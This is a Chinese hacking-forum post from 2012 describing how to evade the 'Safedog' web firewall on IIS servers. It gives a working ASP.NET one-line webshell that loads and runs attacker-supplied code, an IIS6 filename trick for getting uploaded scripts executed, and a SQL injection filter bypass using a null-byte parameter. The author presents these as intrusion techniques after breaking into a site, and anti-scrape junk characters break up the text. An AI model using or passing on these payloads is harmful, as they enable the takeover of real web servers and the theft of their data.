找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2172|回复: 0
打印 上一主题 下一主题

突破安全狗防注入及上传的一些思路

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-31 08:25:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、绕过IIS安全狗的一句话。" w" |0 g2 Y* b( [2 L# b
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。+ n# s* m* @$ a5 u
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。* T  F9 K- E2 X5 T" ^, U

! Q$ k1 x1 R: O3 I4 R* ^2、IIS6.0解析漏洞遇到安全狗。4 L9 [3 ?4 X/ e) \; W. E& n' i
文件名为
4 U6 X9 r" U5 y% N$ Z5 r5 m1 |http://www.xxxxx.com/sh3llc0de.asp;1.jpg8 |" ~, _: x1 |6 j9 P( ^6 \

! e) [9 _7 m3 i9 n  l7 y+ i这样的会被IIS安全狗果断屏蔽。1 n2 N- S- A: H! q' M+ M
改成如下名称,IIS6一样会解析:
. ^- [1 K! t& R2 A  r9 H5 dwww.xxxxx.com/;1.asp;1.jpg+ E1 T; [; Z% a  `, `/ O9 X
* S# b4 n# I% _: V. R3 e. I
3、安全狗的注入绕过。( K0 L$ M- ^! f) w( [5 I
常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。
. z5 Y6 j0 U9 A* z但如果:
! o' @! y; r; \" or00ts.asp?r00ts.com=%00.&id=69%20 and 1=1- _+ A0 g+ a8 u2 X* i7 i
就可以成功绕过了。! n( g. Y( T* }1 Q" S

& f) t5 @3 b  Q% z  ?
" Y) p; J5 n' X; N# ~+ z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表